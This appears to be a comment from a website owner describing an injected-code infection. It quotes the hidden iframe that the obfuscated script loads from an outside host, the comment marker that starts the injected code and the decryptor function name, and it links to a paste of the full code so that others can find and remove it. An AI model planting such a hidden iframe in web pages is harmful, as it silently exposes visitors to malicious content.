For anyone else looking for this problem, I was also attacked by this, the Iframe it tries to decrypt and load is this:
<iframe style='display: none;' src='http://r52host.org/stat/1.png'></iframe>
Also, there isn’t much in the way of Google results for this problem so I’ll add a couple of pointers for the search engines:
The malicious code begins with <!-- start counter :rkgi58s1 --> (The last bit is probably randomly generated).
And the javascript function is function dc(x)
Here’s a full paste of the malicious code:
http://wordpress.pastebin.ca/968800
Hope this helps others looking for a solution!
Regards,
James.